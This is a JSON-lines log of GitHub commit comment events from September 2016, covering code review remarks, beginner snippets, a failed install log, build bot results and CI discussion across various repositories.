{"id":"4627137020","type":"CommitCommentEvent","actor":{"login":"Rafael-Herculano"},"repo":{"name":"Rafael-Herculano/MeuPrimeiroProjeto"},"payload":{"comment":{"id":19198614,"position":null,"line":null,"path":null,"commit_id":"8d70a579c58ac461525a06447916c9fa056cfa8b","created_at":"2016-09-27T21:41:30Z","updated_at":"2016-09-27T21:41:30Z","body":"Criando meu primeiro branch"}},"created_at":"2016-09-27T21:41:30Z"}
{"id":"4627137310","type":"CommitCommentEvent","actor":{"login":"kiecker223"},"repo":{"name":"kiecker223/AHS-Robotics-Website"},"payload":{"comment":{"id":19198615,"position":null,"line":null,"path":null,"commit_id":"12645092fe5ac154dd493c09f07bed7ac0ce7d09","created_at":"2016-09-27T21:41:34Z","updated_at":"2016-09-27T21:41:34Z","body":"Nice commit, nice to see how far you have come in the git command line 📦 "}},"created_at":"2016-09-27T21:41:34Z"}
{"id":"4627141118","type":"CommitCommentEvent","actor":{"login":"Rafael-Herculano"},"repo":{"name":"Rafael-Herculano/MeuPrimeiroProjeto"},"payload":{"comment":{"id":19198624,"position":2,"line":2,"path":"README.md","commit_id":"8d70a579c58ac461525a06447916c9fa056cfa8b","created_at":"2016-09-27T21:42:22Z","updated_at":"2016-09-27T21:42:22Z","body":"<!DOCTYPE html>\r\n<html>\r\n    <head>\r\n\t</head>\r\n\t<body>\r\n        <p>\r\n          <?php\r\n            echo \"Minha primeira linha em PHP!\"; \r\n          ?>\r\n        </p>\r\n\t</body>\r\n</html>"}},"created_at":"2016-09-27T21:42:22Z"}
{"id":"4627142869","type":"CommitCommentEvent","actor":{"login":"katie7r"},"repo":{"name":"cuttlesoft/flask-workshop"},"payload":{"comment":{"id":19198632,"position":4,"line":3,"path":"app/views.py","commit_id":"97ef687f24b5efc7783d551c5e1fb793f56da578","created_at":"2016-09-27T21:42:43Z","updated_at":"2016-09-27T21:42:43Z","body":"The flash messages are commented out currently, because they will not display until we add them to our templates."}},"created_at":"2016-09-27T21:42:43Z"}
{"id":"4627145404","type":"CommitCommentEvent","actor":{"login":"ahh2131"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198637,"position":3,"line":3,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:43:12Z","updated_at":"2016-09-27T21:43:12Z","body":"ah , they will look at your github if you have something there for sure\nthough - and if there's something to read it's much easier to make a\nstatement that way\n\nOn Tue, Sep 27, 2016 at 5:37 PM, Hank <notifications@github.com> wrote:\n\n> Alright alright\n>\n> Btw, this is not for an employer. But I have been curious to what extent\n> they will view this stuff like one, since the program is aimed towards\n> beginners as well (which tbh, I consider myself closer to that side of the\n> spectrum).\n>\n> What is a production environment? I have no idea\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/HankShorb/Sticks-Stones/commit/0d505162af471ec320d298a516c92e24bce4d6f8#commitcomment-19198571>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADcMX7pB8nJa7rIyfk0A2pjcuGkaxE6Iks5quYyzgaJpZM4KIKb2>\n> .\n>\n"}},"created_at":"2016-09-27T21:43:12Z"}
{"id":"4627150205","type":"CommitCommentEvent","actor":{"login":"ahh2131"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198647,"position":3,"line":3,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:44:07Z","updated_at":"2016-09-27T21:44:07Z","body":"production environment means 'released to the world', essentially - what\nsecurity risks exist now, can a lot of people use it at once, is it\nfunctionally useful UX and UI wise for the target user, stuff that needs to\nbe taken into account when releasing a product for real\n\nOn Tue, Sep 27, 2016 at 5:43 PM, Andreas Harris Hadjigeorgiou <\nahh2131@columbia.edu> wrote:\n\n> ah , they will look at your github if you have something there for sure\n> though - and if there's something to read it's much easier to make a\n> statement that way\n>\n> On Tue, Sep 27, 2016 at 5:37 PM, Hank <notifications@github.com> wrote:\n>\n>> Alright alright\n>>\n>> Btw, this is not for an employer. But I have been curious to what extent\n>> they will view this stuff like one, since the program is aimed towards\n>> beginners as well (which tbh, I consider myself closer to that side of the\n>> spectrum).\n>>\n>> What is a production environment? I have no idea\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/HankShorb/Sticks-Stones/commit/0d505162af471ec320d298a516c92e24bce4d6f8#commitcomment-19198571>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ADcMX7pB8nJa7rIyfk0A2pjcuGkaxE6Iks5quYyzgaJpZM4KIKb2>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-27T21:44:07Z"}
{"id":"4627150231","type":"CommitCommentEvent","actor":{"login":"katie7r"},"repo":{"name":"cuttlesoft/flask-workshop"},"payload":{"comment":{"id":19198648,"position":1,"line":1,"path":"app/templates/signup.html","commit_id":"a40f7fc16fb368a1a4544395aa109585a335225d","created_at":"2016-09-27T21:44:08Z","updated_at":"2016-09-27T21:44:08Z","body":"This is one way to provide the title for the layout."}},"created_at":"2016-09-27T21:44:08Z"}
{"id":"4627153673","type":"CommitCommentEvent","actor":{"login":"katie7r"},"repo":{"name":"cuttlesoft/flask-workshop"},"payload":{"comment":{"id":19198658,"position":25,"line":28,"path":"app/views.py","commit_id":"a40f7fc16fb368a1a4544395aa109585a335225d","created_at":"2016-09-27T21:44:49Z","updated_at":"2016-09-27T21:44:49Z","body":"This is another way to provide the title for the layout."}},"created_at":"2016-09-27T21:44:49Z"}
{"id":"4627161294","type":"CommitCommentEvent","actor":{"login":"ridgewell"},"repo":{"name":"ridgewell/gccaedits-ip-address-ranges"},"payload":{"comment":{"id":19198676,"position":null,"line":null,"path":null,"commit_id":"0b9acecd89cf585f3c1a966b6fd3e9ec041cdd4d","created_at":"2016-09-27T21:46:20Z","updated_at":"2016-09-27T21:46:20Z","body":"Source: http://bgp.he.net/AS25689#_prefixes"}},"created_at":"2016-09-27T21:46:20Z"}
{"id":"4627163064","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19198680,"position":null,"line":null,"path":null,"commit_id":"0ee7e83a4657c5d823a6b17dff6c8032d38a3366","created_at":"2016-09-27T21:46:41Z","updated_at":"2016-09-27T21:46:41Z","body":"Yeah I don't think this is the right approach.  It seems to me that the issue is in the construct last name, probably something about the spacer that is returned from getNameSuffix?\r\n\r\nhttps://github.com/NREL/OpenStudio/blob/0ee7e83a4657c5d823a6b17dff6c8032d38a3366/openstudiocore/src/utilities/idf/Workspace.cpp#L2546"}},"created_at":"2016-09-27T21:46:41Z"}
{"id":"4627165368","type":"CommitCommentEvent","actor":{"login":"pcmoore"},"repo":{"name":"rgbriggs/audit-testsuite"},"payload":{"comment":{"id":19198683,"position":87,"line":87,"path":"tests/filter_sessionid/test","commit_id":"2584bcc842da7511dbac3482f2eaf2afc6f2db39","created_at":"2016-09-27T21:47:11Z","updated_at":"2016-09-27T21:47:11Z","body":"We could remove the 'ses' match in this case, couldn't we?  Unless I'm mistaken, when using the '${key}_set' match we could match on any session ID so long as it was set, yes?\r\n\r\nIf true, it seems like we would be better served to omit the 'ses' check in this particular case, even though we probably will only catch sessions that match '$sessionid' in this test."}},"created_at":"2016-09-27T21:47:11Z"}
{"id":"4627172481","type":"CommitCommentEvent","actor":{"login":"strawncourt"},"repo":{"name":"strawncourt/Fewd-Homework2"},"payload":{"comment":{"id":19198698,"position":null,"line":null,"path":null,"commit_id":"67aa1d656aea14f3c2caa4cbd9f5e18cccb22759","created_at":"2016-09-27T21:48:36Z","updated_at":"2016-09-27T21:48:36Z","body":"Thanks for all your help - I am getting there with your and Seth's help and I appreciate all your input!\r\n"}},"created_at":"2016-09-27T21:48:36Z"}
{"id":"4627180099","type":"CommitCommentEvent","actor":{"login":"riskybacon"},"repo":{"name":"nmc-probe/emulab-devel"},"payload":{"comment":{"id":19198725,"position":null,"line":null,"path":null,"commit_id":"b74372fd5a79abca302e8392f116a55c639c76b9","created_at":"2016-09-27T21:50:06Z","updated_at":"2016-09-27T21:50:06Z","body":"Error message associated with this commit:\r\n\r\n```\r\ncd /usr/testbed/obj/testbed\r\n/usr/testbed/src/testbed/configure --with-TBDEFS=/etc/emulab/northslope.conf\r\ncd install\r\nperl emulab-install -b -p /var/tmp/packages boss\r\n\r\n\r\n##### Installation failed in phase database:\r\nUnable to execute: '/usr/local/bin/mysql tbdb < /usr/testbed/src/testbed/sql/database-fill-supplemental.sql'\r\n-------------------- Phase Stack ----------------------------\r\nsdbdata    Filling tables with supplemental data             \r\ndatabase   Setting up database                               \r\n--------------------------------------------------------------\r\n------------------------------------------ Last Command Output\r\nCommand: /usr/local/bin/mysql tbdb < /usr/testbed/src/testbed/sql/database-fill-supplemental.sql\r\nERROR 1136 (21S01) at line 8: Column count doesn't match value count at row 1\r\n--------------------------------------------------------------\r\nPlease send the above output to testbed-ops@emulab.net\r\n```"}},"created_at":"2016-09-27T21:50:06Z"}
{"id":"4627181961","type":"CommitCommentEvent","actor":{"login":"ctrueden"},"repo":{"name":"ClearVolume/imglib2-clearvolume"},"payload":{"comment":{"id":19198726,"position":null,"line":null,"path":null,"commit_id":"16611c49cc454b9ddddb0c5cb4366cc5ccb5a221","created_at":"2016-09-27T21:50:28Z","updated_at":"2016-09-27T21:50:28Z","body":"Thanks @skalarproduktraum !"}},"created_at":"2016-09-27T21:50:28Z"}
{"id":"4627182509","type":"CommitCommentEvent","actor":{"login":"JReyLBC"},"repo":{"name":"robscodebase/azo"},"payload":{"comment":{"id":19198728,"position":112,"line":115,"path":"parser.go","commit_id":"4573c902e98a96aff6ec09a0a2e8c4d0a3fb9b4e","created_at":"2016-09-27T21:50:34Z","updated_at":"2016-09-27T21:50:34Z","body":"This should not return a string to indicate the function is done. You know it's done because it returns."}},"created_at":"2016-09-27T21:50:34Z"}
{"id":"4627182835","type":"CommitCommentEvent","actor":{"login":"kcudnik"},"repo":{"name":"bridgedotnet/Bridge"},"payload":{"comment":{"id":19198729,"position":46,"line":281,"path":"Bridge/Resources/Array.js","commit_id":"1addefbb0fe77ea3a614850cd6e7cc30bc7cd24f","created_at":"2016-09-27T21:50:38Z","updated_at":"2016-09-27T21:50:38Z","body":"return is not needed, copyTo is void"}},"created_at":"2016-09-27T21:50:38Z"}
{"id":"4627182915","type":"CommitCommentEvent","actor":{"login":"episodeyang"},"repo":{"name":"SchusterLab/MaskMaker"},"payload":{"comment":{"id":19198730,"position":null,"line":null,"path":null,"commit_id":"3f2fa8d0ffa6d5caf3d6e3a2c56f402cbc5179c3","created_at":"2016-09-27T21:50:38Z","updated_at":"2016-09-27T21:50:38Z","body":"This fixed the bug:  #3\r\n\r\n### Before\r\n\r\n<img width=\"540\" alt=\"screenshot 2016-09-27 16 48 45\" src=\"https://cloud.githubusercontent.com/assets/630490/18893166/4e1c2f68-84d2-11e6-8ded-400f870ec8b9.png\">\r\n\r\n### After\r\n\r\n<img width=\"481\" alt=\"screenshot 2016-09-27 16 47 47\" src=\"https://cloud.githubusercontent.com/assets/630490/18893126/250e6f0a-84d2-11e6-9cac-9b68a8df4177.png\">"}},"created_at":"2016-09-27T21:50:38Z"}
{"id":"4627185328","type":"CommitCommentEvent","actor":{"login":"episodeyang"},"repo":{"name":"SchusterLab/MaskMaker"},"payload":{"comment":{"id":19198734,"position":null,"line":null,"path":null,"commit_id":"11374fbf0073909cc4026c80136315dffe2e1616","created_at":"2016-09-27T21:51:06Z","updated_at":"2016-09-27T21:51:06Z","body":"First attempt at fixing this bug #3 "}},"created_at":"2016-09-27T21:51:06Z"}
{"id":"4627185932","type":"CommitCommentEvent","actor":{"login":"katie7r"},"repo":{"name":"cuttlesoft/flask-workshop"},"payload":{"comment":{"id":19198736,"position":19,"line":19,"path":"app/templates/base.html","commit_id":"a40f7fc16fb368a1a4544395aa109585a335225d","created_at":"2016-09-27T21:51:13Z","updated_at":"2016-09-27T21:51:13Z","body":"Extending from a base layout makes it particularly easy to add or update shared elements across templates. For example, the appropriate flash messages can now appear in any template."}},"created_at":"2016-09-27T21:51:13Z"}
{"id":"4627187055","type":"CommitCommentEvent","actor":{"login":"jrose-apple"},"repo":{"name":"erg/swift"},"payload":{"comment":{"id":19198740,"position":4,"line":74,"path":"utils/find-overlay-dependencies.sh","commit_id":"8fe1054884bf537a144ddd47081f5b3772d52899","created_at":"2016-09-27T21:51:28Z","updated_at":"2016-09-27T21:51:28Z","body":"Just to be sure, we should probably put `\\b` around these too."}},"created_at":"2016-09-27T21:51:28Z"}
{"id":"4627189085","type":"CommitCommentEvent","actor":{"login":"troymohl"},"repo":{"name":"mweser/alliance"},"payload":{"comment":{"id":19198747,"position":129,"line":129,"path":"catalog/nsili/catalog-nsili-endpoint/src/main/java/org/codice/alliance/nsili/endpoint/EmailSenderImpl.java","commit_id":"7f99215b72f6f387e09ecf5b6e927ad5b2134b3a","created_at":"2016-09-27T21:51:55Z","updated_at":"2016-09-27T21:51:55Z","body":"Looks like this line is duplicated `multipart.addBodyPart(messageBodyPart);`"}},"created_at":"2016-09-27T21:51:55Z"}
{"id":"4627190156","type":"CommitCommentEvent","actor":{"login":"rvennam"},"repo":{"name":"IBM-Bluemix/logistics-wizard-toolchain"},"payload":{"comment":{"id":19198750,"position":null,"line":null,"path":null,"commit_id":"7c8bde4cd6fff9c8895db9c2d3845010ede8e21a","created_at":"2016-09-27T21:52:09Z","updated_at":"2016-09-27T21:52:09Z","body":"@l2fprod please review"}},"created_at":"2016-09-27T21:52:09Z"}
{"id":"4627192766","type":"CommitCommentEvent","actor":{"login":"beanwonder"},"repo":{"name":"beanwonder/EECS343"},"payload":{"comment":{"id":19198757,"position":null,"line":null,"path":null,"commit_id":"5e0ff205107b0ce55dfff02e833f4423578645d1","created_at":"2016-09-27T21:52:40Z","updated_at":"2016-09-27T21:52:40Z","body":"yeah in the standard C or older gcc complier it is not allowed "}},"created_at":"2016-09-27T21:52:40Z"}
{"id":"4627193708","type":"CommitCommentEvent","actor":{"login":"ZebraGit"},"repo":{"name":"ZebraGit/Test01"},"payload":{"comment":{"id":19198759,"position":null,"line":null,"path":null,"commit_id":"6b97afa2f9127d9fc8d0633718fc8b4a2dc6705e","created_at":"2016-09-27T21:52:51Z","updated_at":"2016-09-27T21:52:51Z","body":"This is the line 02"}},"created_at":"2016-09-27T21:52:51Z"}
{"id":"4627195470","type":"CommitCommentEvent","actor":{"login":"SerP888"},"repo":{"name":"SerP888/valley"},"payload":{"comment":{"id":19198764,"position":null,"line":null,"path":null,"commit_id":"e979245f528c26cd8aa8e6977a54e5f577b668d2","created_at":"2016-09-27T21:53:13Z","updated_at":"2016-09-27T21:53:13Z","body":"git add wallie.py\r\ngit commit -m \"исправлен баг\""}},"created_at":"2016-09-27T21:53:13Z"}
{"id":"4627195716","type":"CommitCommentEvent","actor":{"login":"LKrince"},"repo":{"name":"goldenpartner/Assignment1"},"payload":{"comment":{"id":19198767,"position":null,"line":null,"path":null,"commit_id":"5735070dfa373e1dec36992c9a33c6c3b09079e8","created_at":"2016-09-27T21:53:16Z","updated_at":"2016-09-27T21:53:16Z","body":"good job man!"}},"created_at":"2016-09-27T21:53:16Z"}
{"id":"4627201216","type":"CommitCommentEvent","actor":{"login":"Dav2106"},"repo":{"name":"Dav2106/Project"},"payload":{"comment":{"id":19198776,"position":null,"line":null,"path":null,"commit_id":"625e8493e1f4b82b0daa9528b91871ee76ee2973","created_at":"2016-09-27T21:54:21Z","updated_at":"2016-09-27T21:54:21Z","body":"Me devolví a atrás"}},"created_at":"2016-09-27T21:54:21Z"}
{"id":"4627202042","type":"CommitCommentEvent","actor":{"login":"episodeyang"},"repo":{"name":"SchusterLab/M017_Yggdrasil"},"payload":{"comment":{"id":19198780,"position":null,"line":null,"path":null,"commit_id":"efd3b0d80ae614a3f6eeb18bf97dd41b73c32d7f","created_at":"2016-09-27T21:54:31Z","updated_at":"2016-09-27T21:54:31Z","body":"This closes #13 "}},"created_at":"2016-09-27T21:54:31Z"}
{"id":"4627206090","type":"CommitCommentEvent","actor":{"login":"troymohl"},"repo":{"name":"mweser/alliance"},"payload":{"comment":{"id":19198790,"position":147,"line":147,"path":"catalog/nsili/catalog-nsili-endpoint/src/main/java/org/codice/alliance/nsili/endpoint/EmailSenderImpl.java","commit_id":"7f99215b72f6f387e09ecf5b6e927ad5b2134b3a","created_at":"2016-09-27T21:55:23Z","updated_at":"2016-09-27T21:55:23Z","body":"Suggest using try with resources so outputstream is always closed.\r\ne.g. `try (OutputStream outputStream = new FileOutputStream(file)) {`\r\nremove `outputStream.close()` as that will automatically be called.\r\n"}},"created_at":"2016-09-27T21:55:23Z"}
{"id":"4627208820","type":"CommitCommentEvent","actor":{"login":"bdeining"},"repo":{"name":"mweser/alliance"},"payload":{"comment":{"id":19198800,"position":152,"line":152,"path":"catalog/nsili/catalog-nsili-endpoint/src/main/java/org/codice/alliance/nsili/endpoint/EmailSenderImpl.java","commit_id":"7f99215b72f6f387e09ecf5b6e927ad5b2134b3a","created_at":"2016-09-27T21:55:56Z","updated_at":"2016-09-27T21:55:56Z","body":"LOGGER.debug"}},"created_at":"2016-09-27T21:55:56Z"}
{"id":"4627213534","type":"CommitCommentEvent","actor":{"login":"bdeining"},"repo":{"name":"mweser/alliance"},"payload":{"comment":{"id":19198813,"position":65,"line":400,"path":"distribution/sdk/sample-nsili-client/src/main/java/org/codice/alliance/nsili/client/NsiliClient.java","commit_id":"7f99215b72f6f387e09ecf5b6e927ad5b2134b3a","created_at":"2016-09-27T21:56:54Z","updated_at":"2016-09-27T21:56:54Z","body":"After rebase with master, all these `System.outs` will change to LOGGER "}},"created_at":"2016-09-27T21:56:54Z"}
{"id":"4627214078","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19198817,"position":null,"line":null,"path":null,"commit_id":"7b47e453b4207fd758a2e2d2f5c642c15a8f32a6","created_at":"2016-09-27T21:57:01Z","updated_at":"2016-09-27T21:57:01Z","body":"Sorry I have no idea. Didn't even know you have to install anything. What is this, Ubuntu 14.04?"}},"created_at":"2016-09-27T21:57:01Z"}
{"id":"4627218490","type":"CommitCommentEvent","actor":{"login":"timj"},"repo":{"name":"lsst/afw"},"payload":{"comment":{"id":19198827,"position":null,"line":null,"path":null,"commit_id":"c0debc6e0715e8f9d715f1f211b770d8dae0605c","created_at":"2016-09-27T21:57:53Z","updated_at":"2016-09-27T21:57:53Z","body":"I feel that we should treat this as a temporary bandaid. We should definitely aim for the real fix of saying we know the ICD requires an AIRTEMP but we do not know its value. It's much easier when validating headers if we are explicit about undefined values rather than being unsure as to whether the absence of a header is because writing one was never attempted, or because we did not know the value. I strongly advocate fixing daf_base (and astropy) to meet the standard and to use the standard (ten years ago I had the same debate with CADC over JCMT FITS files and we fixed their system and the Starlink software)."}},"created_at":"2016-09-27T21:57:53Z"}
{"id":"4627221922","type":"CommitCommentEvent","actor":{"login":"meshula"},"repo":{"name":"PixarAnimationStudios/USD"},"payload":{"comment":{"id":19198837,"position":null,"line":null,"path":null,"commit_id":"f5a5ff12486c43528afa1502b305f0dc65da9821","created_at":"2016-09-27T21:58:37Z","updated_at":"2016-09-27T21:58:37Z","body":"yay :)"}},"created_at":"2016-09-27T21:58:37Z"}
{"id":"4627225902","type":"CommitCommentEvent","actor":{"login":"dsaisat"},"repo":{"name":"dsaisat/UniDAC_XE7"},"payload":{"comment":{"id":19198846,"position":null,"line":null,"path":null,"commit_id":"62d58b3b31790dce86421a3afe4ab3d34d990a44","created_at":"2016-09-27T21:59:24Z","updated_at":"2016-09-27T21:59:24Z","body":"jkjk"}},"created_at":"2016-09-27T21:59:24Z"}
{"id":"4627226076","type":"CommitCommentEvent","actor":{"login":"nekrozar"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19198848,"position":null,"line":null,"path":null,"commit_id":"6b531690b65f69b7f194df55c8d3ab7cb60830e4","created_at":"2016-09-27T21:59:27Z","updated_at":"2016-09-27T21:59:27Z","body":"Juunishishi Drancia\r\n> 「十二獣ドランシア」は1ターンに1度、**同名カード以外の**自分フィールドの「十二獣」モンスターの上に重ねてX召喚する事もできる。\r\n> Once per turn, you can also Xyz Summon \"Juunishishi Drancia\" by using 1 \"Juunishishi\" monster you control **with a different name** as the Xyz Material. (Xyz Materials attached to that monster also become Xyz Materials on this card.)\r\n\r\nGalaxy-Eyes Full Armor Photon Dragon\r\n> このカードは**「ギャラクシーアイズ FA・フォトン・ドラゴン」以外の**自分フィールドの「ギャラクシーアイズ」Xモンスターの上にこのカードを重ねてX召喚する事もできる。\r\n> You can also Xyz Summon this card by using a \"Galaxy-Eyes\" Xyz Monster you control as the Xyz Material, **except \"Galaxy-Eyes Full Armor Photon Dragon\"**. (Xyz Materials attached to that monster also become Xyz Materials on this card.)\r\n\r\nHowever, Juunishishi doesn't exist that change card name effect.\r\nMaybe there is no problem even if we use `aux.AddXyzProcedure`."}},"created_at":"2016-09-27T21:59:27Z"}
{"id":"4627228983","type":"CommitCommentEvent","actor":{"login":"borisbstyle"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19198855,"position":null,"line":null,"path":null,"commit_id":"0df7cdaf7ad293c65acd7f2f438bea79ee1e6da7","created_at":"2016-09-27T22:00:03Z","updated_at":"2016-09-27T22:00:03Z","body":"👍 "}},"created_at":"2016-09-27T22:00:03Z"}
{"id":"4627237468","type":"CommitCommentEvent","actor":{"login":"sakiss"},"repo":{"name":"sakiss/ShipTracker"},"payload":{"comment":{"id":19198877,"position":null,"line":null,"path":null,"commit_id":"77420642e92f085c2170023aa5376527d3c4dbd3","created_at":"2016-09-27T22:01:37Z","updated_at":"2016-09-27T22:01:37Z","body":"Chained Command Pattern. The request and the response can change in any way through commands passed in the di.xml"}},"created_at":"2016-09-27T22:01:37Z"}
{"id":"4627247288","type":"CommitCommentEvent","actor":{"login":"popcorncolonel"},"repo":{"name":"popcorncolonel/Chrome-Extensions"},"payload":{"comment":{"id":19198904,"position":75,"line":348,"path":"Kappa Everywhere/contentscript.js","commit_id":"365f938289577306cad9754867d44c9f27e7866c","created_at":"2016-09-27T22:03:45Z","updated_at":"2016-09-27T22:03:45Z","body":"Lol alright. You do you dude. \r\n\r\nThere's a ton of cleaning up to do, so I don't really see a point in not starting from scratch. "}},"created_at":"2016-09-27T22:03:45Z"}
{"id":"4627251005","type":"CommitCommentEvent","actor":{"login":"LeonidVeriga"},"repo":{"name":"bridgedotnet/Bridge"},"payload":{"comment":{"id":19198918,"position":46,"line":281,"path":"Bridge/Resources/Array.js","commit_id":"1addefbb0fe77ea3a614850cd6e7cc30bc7cd24f","created_at":"2016-09-27T22:04:30Z","updated_at":"2016-09-27T22:04:30Z","body":"@kcudnik, :+1:, sure, thanks for pointing this.\r\n\r\n\r\n"}},"created_at":"2016-09-27T22:04:30Z"}
{"id":"4627253727","type":"CommitCommentEvent","actor":{"login":"LKrince"},"repo":{"name":"goldenpartner/Assignment1"},"payload":{"comment":{"id":19198923,"position":3,"line":3,"path":"README.md","commit_id":"cfd490f5e4a5122ad74c7c071bea18be381fb5f5","created_at":"2016-09-27T22:05:02Z","updated_at":"2016-09-27T22:05:02Z","body":"hey bro"}},"created_at":"2016-09-27T22:05:02Z"}
{"id":"4627259086","type":"CommitCommentEvent","actor":{"login":"RoadDragon"},"repo":{"name":"RoadDragon/codeplayer"},"payload":{"comment":{"id":19198943,"position":null,"line":null,"path":null,"commit_id":"74d4d3831e7277fbeb495a28e636082b8897948a","created_at":"2016-09-27T22:06:09Z","updated_at":"2016-09-27T22:06:09Z","body":"9/27/16:  Code created by following Rob's walkthrough. Code in Panels do not change output. Checked each line of code. Not sure what is incorrect. Help would be appreciated.\r\n\r\n9/26/16: My attempt at codeplayer with no help\r\n\r\n\r\nThis is an exercise from [(http://bit.ly/2cqOvfm)] for Rob Percival’s Web Development 2.0 on Udemy"}},"created_at":"2016-09-27T22:06:09Z"}
{"id":"4627263163","type":"CommitCommentEvent","actor":{"login":"JeremDsgn"},"repo":{"name":"JeremDsgn/react-slick"},"payload":{"comment":{"id":19198956,"position":35,"line":22,"path":"src/dots.jsx","commit_id":"1659614b1183b023a0a162577af7abbd04eba03f","created_at":"2016-09-27T22:06:58Z","updated_at":"2016-09-27T22:06:58Z","body":"```\u001d\r\nslideCount,\r\nslidesToScroll\r\n```\u001e"}},"created_at":"2016-09-27T22:06:58Z"}
{"id":"4627271970","type":"CommitCommentEvent","actor":{"login":"RoadDragon"},"repo":{"name":"RoadDragon/codeplayer"},"payload":{"comment":{"id":19198977,"position":null,"line":null,"path":null,"commit_id":"74d4d3831e7277fbeb495a28e636082b8897948a","created_at":"2016-09-27T22:08:47Z","updated_at":"2016-09-27T22:08:47Z","body":"This is what it is supposed to look like: http://www.completewebdevelopercourse.com/content/4-jquery/4.15.html"}},"created_at":"2016-09-27T22:08:47Z"}
{"id":"4627276891","type":"CommitCommentEvent","actor":{"login":"nottu2584"},"repo":{"name":"nottu2584/furiagamingcommunity-games"},"payload":{"comment":{"id":19198985,"position":null,"line":null,"path":null,"commit_id":"9b77f1680d8b7b6d1144311be18f64f200afb743","created_at":"2016-09-27T22:09:50Z","updated_at":"2016-09-27T22:09:50Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Perfiles de usuario](https://trello.com/c/A8s87HuL/1-perfiles-de-usuario)"}},"created_at":"2016-09-27T22:09:50Z"}
{"id":"4627277742","type":"CommitCommentEvent","actor":{"login":"nottu2584"},"repo":{"name":"nottu2584/furiagamingcommunity-games"},"payload":{"comment":{"id":19198989,"position":null,"line":null,"path":null,"commit_id":"62b0bdb2a1d98f2034a25a8daee37e2d19ab6645","created_at":"2016-09-27T22:10:01Z","updated_at":"2016-09-27T22:10:01Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Perfiles de usuario](https://trello.com/c/A8s87HuL/1-perfiles-de-usuario)"}},"created_at":"2016-09-27T22:10:01Z"}
{"id":"4627278871","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19198992,"position":null,"line":null,"path":null,"commit_id":"0ee7e83a4657c5d823a6b17dff6c8032d38a3366","created_at":"2016-09-27T22:10:14Z","updated_at":"2016-09-27T22:10:14Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2308 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0ee7e83a4657c5d823a6b17dff6c8032d38a3366-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0ee7e83a4657c5d823a6b17dff6c8032d38a3366-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.43%25-yellow.svg)</a> \n"}},"created_at":"2016-09-27T22:10:14Z"}
{"id":"4627281275","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19198998,"position":null,"line":null,"path":null,"commit_id":"7b47e453b4207fd758a2e2d2f5c642c15a8f32a6","created_at":"2016-09-27T22:10:43Z","updated_at":"2016-09-27T22:10:43Z","body":"I am not sure what version.  It is 'lubuntu' whatever that means.   I tried a 'apt-cache search libasan' in case it was libasan-devel or something like that.  But that apt-cache returned nothing.   I guess I could try 'apt-cache search asan' and get all the other 'partial' hits, and dig through it, but short of that, I am not sure what needs installed.\r\n\r\nYes, getting asan working (at least on Fedora), is dnf install libasan    Now in hindsight (IIRC), libasan was not working right on ubuntu (yes, on mine I do see libasan0), so we may have to target circle CI anyway (which is Fedora).   \r\n\r\nI think this is a great idea, but not 100% sure what to expect or how to proceed..   Who was our CI guru around here?  @claudioandre , @kholia ??  Certainly is not me.\r\n\r\nBut what needs done is we need the proper environment (yes, it may be that CircleCI has to be used for this), and then simply get libasan installed, and add the --enable-asan to the ./configure line.  Thats it.\r\n\r\nThen if there are asan problems, then the --test-full=0 run will NOT be successful.  Hopefully we can get a nice stack trace on the crash, but even if not, we know which format triggered the asan error."}},"created_at":"2016-09-27T22:10:43Z"}
{"id":"4627281361","type":"CommitCommentEvent","actor":{"login":"runcom"},"repo":{"name":"mrunalp/ocid-1"},"payload":{"comment":{"id":19198999,"position":9,"line":27,"path":"test/pod.bats","commit_id":"fd91998ef3533ae161631db7791f3ded02f00289","created_at":"2016-09-27T22:10:44Z","updated_at":"2016-09-27T22:10:44Z","body":"Argh, I didn't spot this, also I think the code below is the same as the one from line 21 and that's basically the same test. I'll make a PR to drop this tomorrow. "}},"created_at":"2016-09-27T22:10:44Z"}
{"id":"4627282480","type":"CommitCommentEvent","actor":{"login":"nekrozar"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19199003,"position":null,"line":null,"path":null,"commit_id":"2582c6ee86b25df16776a9a7c8d5d79a87a01c75","created_at":"2016-09-27T22:10:58Z","updated_at":"2016-09-27T22:10:58Z","body":"I checked it once again.\r\nShogi Rook gained effect."}},"created_at":"2016-09-27T22:10:58Z"}
